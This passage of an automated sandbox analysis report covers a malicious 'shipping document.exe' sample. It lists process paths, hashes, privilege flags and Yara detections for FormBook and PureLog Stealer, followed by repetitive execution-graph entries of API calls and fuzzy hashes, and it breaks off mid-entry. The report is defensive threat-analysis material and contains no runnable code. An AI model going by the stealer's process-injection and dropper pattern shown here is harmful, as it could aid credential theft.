                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1680848791.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1677691413.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:07:25:17
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Users\user\Desktop\shipping document.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\shipping document.exe"
                                                                                              Imagebase:0xc80000
                                                                                              File size:730'112 bytes
                                                                                              MD5 hash:180165361384E56DB00389733F0C54F5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:07:25:45
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe"
                                                                                              Imagebase:0xb70000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:7
                                                                                              Start time:07:25:46
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Windows\SysWOW64\openfiles.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\openfiles.exe"
                                                                                              Imagebase:0x370000
                                                                                              File size:60'416 bytes
                                                                                              MD5 hash:50BD10A4C573E609A401114488299D3D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:8
                                                                                              Start time:07:25:59
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe"
                                                                                              Imagebase:0xb70000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:9
                                                                                              Start time:07:26:11
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                              Imagebase:0x7ff6bf500000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true


                                                                                                Execution Graph

                                                                                                Execution Coverage:8.9%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:52
                                                                                                Total number of Limit Nodes:3
                                                                                                Execution graph 18780 (node edge list omitted). API calls appearing in the graph: GetModuleHandleW, LoadLibraryExW, DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateActCtxA

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Tedq$Tedq$)"
                                                                                                • API String ID: 0-1060934619
                                                                                                • Opcode ID: d2b5898bb6e27124ab0f06e9bb4017ae6584b548e31dcf38845b1c2ba71c9984
                                                                                                • Instruction ID: 21f1919f9efbffc87e0ef16996183b32b570e5af3879060cb49ec74e600052a1
                                                                                                • Opcode Fuzzy Hash: d2b5898bb6e27124ab0f06e9bb4017ae6584b548e31dcf38845b1c2ba71c9984
                                                                                                • Instruction Fuzzy Hash: CA81C5B4E142098FDB48CFAAC984AEEFBB2FF89310F14902AD815AB354D7355945CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tIh
                                                                                                • API String ID: 0-443931868
                                                                                                • Opcode ID: e41f79e0a7d28a8d502fc93665b4f3b9c8846d1e605f2797a51ce27010fa2d0d
                                                                                                • Instruction ID: a9a5b15748175a2652b9d9255be282198312760db21088be9631474e0d58628a
                                                                                                • Opcode Fuzzy Hash: e41f79e0a7d28a8d502fc93665b4f3b9c8846d1e605f2797a51ce27010fa2d0d
                                                                                                • Instruction Fuzzy Hash: 71D11BB0D2520ADFDB04CF9AC5858AEFBB2FF89300F14D595D815AB214D735AA82CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 07ad3d74db3d264b56227c77b9d56c5227fea7f900de7a701443746429950224
                                                                                                • Instruction ID: 30e34f4719bab40bcf824734b187c8e5f6a4445cfc9b725e4389ac19a8e7956c
                                                                                                • Opcode Fuzzy Hash: 07ad3d74db3d264b56227c77b9d56c5227fea7f900de7a701443746429950224
                                                                                                • Instruction Fuzzy Hash: 58910CB0D1520ADFCB18CFE6D58199DFBB2FB89300F20A416E416B7264D735A945CF28
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a5095356793b435389ed9512c82f30e2c93f2f3b785ea5f183090f9375dae911
                                                                                                • Instruction ID: 0f323a92e25c9d8568c8cb872324c11a34ae5f0a456ed664604ccb3aa087294a
                                                                                                • Opcode Fuzzy Hash: a5095356793b435389ed9512c82f30e2c93f2f3b785ea5f183090f9375dae911
                                                                                                • Instruction Fuzzy Hash: A08105B4E1421ADFCB14DFAAC9809EEFBB1FB89300F10955AD811B7254D7369942CF68
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 035bfba8d1ebfe8e49f2bf5222b29fbea134f774bc43785ad7ba457495307ae7
                                                                                                • Instruction ID: 6ac05ac2f35b3f27b92dcb3aac46df3887bb7c939487bc6e7728ab5879d62011
                                                                                                • Opcode Fuzzy Hash: 035bfba8d1ebfe8e49f2bf5222b29fbea134f774bc43785ad7ba457495307ae7
                                                                                                • Instruction Fuzzy Hash: 4D210CB1E016188BEB18CF9BC9402DEFBF7AFC8310F14C06AD409A6214DB311A85CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0315D01E
                                                                                                • GetCurrentThread.KERNEL32 ref: 0315D05B
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0315D098
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0315D0F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 52777dad7b4ac1fb781b2c6571ae168f208c43f1c5c03dc1bfc042c19542ce3e
                                                                                                • Instruction ID: db5168dbb8525f7cb76c099cb7810bd481f09c1b9cebd78ebdd27b1c2e3350fd
                                                                                                • Opcode Fuzzy Hash: 52777dad7b4ac1fb781b2c6571ae168f208c43f1c5c03dc1bfc042c19542ce3e
                                                                                                • Instruction Fuzzy Hash: 005165B0901349CFDB54CFA9DA88B9EBBF1AF8C314F24845AE418A7390DB345945CB66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0315D01E
                                                                                                • GetCurrentThread.KERNEL32 ref: 0315D05B
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0315D098
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0315D0F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 0e8faa87f96e5c6769d0fadf537f39b87415f109621e1f14b7d4d22aaed27355
                                                                                                • Instruction ID: 2ddc4ce3e00fa03b42c21e4d003c5c21b98bc173bff2f1c9dff12a9e672c5f2a
                                                                                                • Opcode Fuzzy Hash: 0e8faa87f96e5c6769d0fadf537f39b87415f109621e1f14b7d4d22aaed27355
                                                                                                • Instruction Fuzzy Hash: B05154B0900309CFDB54CFAAD688B9EBBF1EF8C314F248459E418A7350DB346984CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 3H5$3H5
                                                                                                • API String ID: 0-2752242361
                                                                                                • Opcode ID: 73bc7972c8a7e1f85d561b0929527607a5a18b1b06a2d9a47963b579acd7ca0e
                                                                                                • Instruction ID: 6144b68561b495590ff4959c174097e29d02c047d20b2725359b78f21e168182
                                                                                                • Opcode Fuzzy Hash: 73bc7972c8a7e1f85d561b0929527607a5a18b1b06a2d9a47963b579acd7ca0e
                                                                                                • Instruction Fuzzy Hash: 352119B0D14209DFCB48DFAAC941AAEFFF1BF89300F24C56A9508B7214E7319A85CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0315AF5E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: dd955670e1ba3c783eecf4985c22f6e8738ae4c6f75206a6b25e6f4d84707121
                                                                                                • Instruction ID: 399079bd269e6ad84f28a89458b7491ab3774106ff6aae8c4dbeb48bd06d56ee
                                                                                                • Opcode Fuzzy Hash: dd955670e1ba3c783eecf4985c22f6e8738ae4c6f75206a6b25e6f4d84707121
                                                                                                • Instruction Fuzzy Hash: F4813570A00B05CFDB25DF29C44479ABBF5FF88304F048A6EE896DBA50D775A849CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 031559A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 031559A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0315D677
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0315D677
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315AFD9,00000800,00000000,00000000), ref: 0315B1EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315AFD9,00000800,00000000,00000000), ref: 0315B1EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0315AFD9,00000800,00000000,00000000), ref: 0315B1EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0315AF5E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: O};5
                                                                                                • API String ID: 0-3558557551
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8hq
                                                                                                • API String ID: 0-4057917415
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Tedq
                                                                                                • API String ID: 0-228892971
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1040d5e82b34104b74b3088be68a643d5071e76aa5c242f9d9e4f3f6fc2b31c8
                                                                                                • Instruction ID: 467e7ad218a44b70b69762b7cd8d4b59e28d8897fcb56af50c5da2a41cba39fd
                                                                                                • Opcode Fuzzy Hash: 1040d5e82b34104b74b3088be68a643d5071e76aa5c242f9d9e4f3f6fc2b31c8
                                                                                                • Instruction Fuzzy Hash: 51412AB1D1070A9BCB14DFA9C8446EEFBF5FF98310F14891AD958B7200E774A685CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9aa42256fa49c65c92e124c2b7f17aa92d2bcceb2aa24005e706580ccfaabf3f
                                                                                                • Instruction ID: e9c66140524599e45393570f33b7b8b5f45e9ca57a01d7cedb96383bd48def7e
                                                                                                • Opcode Fuzzy Hash: 9aa42256fa49c65c92e124c2b7f17aa92d2bcceb2aa24005e706580ccfaabf3f
                                                                                                • Instruction Fuzzy Hash: BE3158B5900209AFCF04DFA9D884A9EBFF9EF48310F10842AE909E7310D735A944CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 60013300e9376f8df388ed9fb951f33cd85aeb7bfc7d62eea623af81f0b82ac4
                                                                                                • Instruction ID: 35699081fd0201ac42099e2e3a28b2c1fd74272714246f30504a8a1745e7dd3a
                                                                                                • Opcode Fuzzy Hash: 60013300e9376f8df388ed9fb951f33cd85aeb7bfc7d62eea623af81f0b82ac4
                                                                                                • Instruction Fuzzy Hash: C421AFB9B007169BCB19EB79989847F7BB7FFC42107544829E816D7380EF309E058761
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675831012.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17bd000_shipping document.jbxd
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1675962992.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_17cd000_shipping document.jbxd
                                                                                                • Instruction Fuzzy Hash: 50016675E01208AFDB44DFA9C589A9DBFF1EF88310F15C195A8089B365DA31E991DF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8547f3750b4d0a3f43e0212a3f1529b0b69e719813eada05de4bd4405baed55a
                                                                                                • Instruction ID: 112debd709584861ec8869fff401035e71831fad63f535ac844f240efd62c40f
                                                                                                • Opcode Fuzzy Hash: 8547f3750b4d0a3f43e0212a3f1529b0b69e719813eada05de4bd4405baed55a
                                                                                                • Instruction Fuzzy Hash: BFE0E5B4E04208EFCB44DFA9D5816ACBBF4EB89304F10C0A9DC09A3340DA36AA42CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f61e2b33fa74e696500afba2a418ba6eb2c81a888da694783b1211f47a0cef98
                                                                                                • Instruction ID: 7829a8c9a5f93e01bcee108fd7542aa0e1ab5ba95bea634a077f04e4fcc065ac
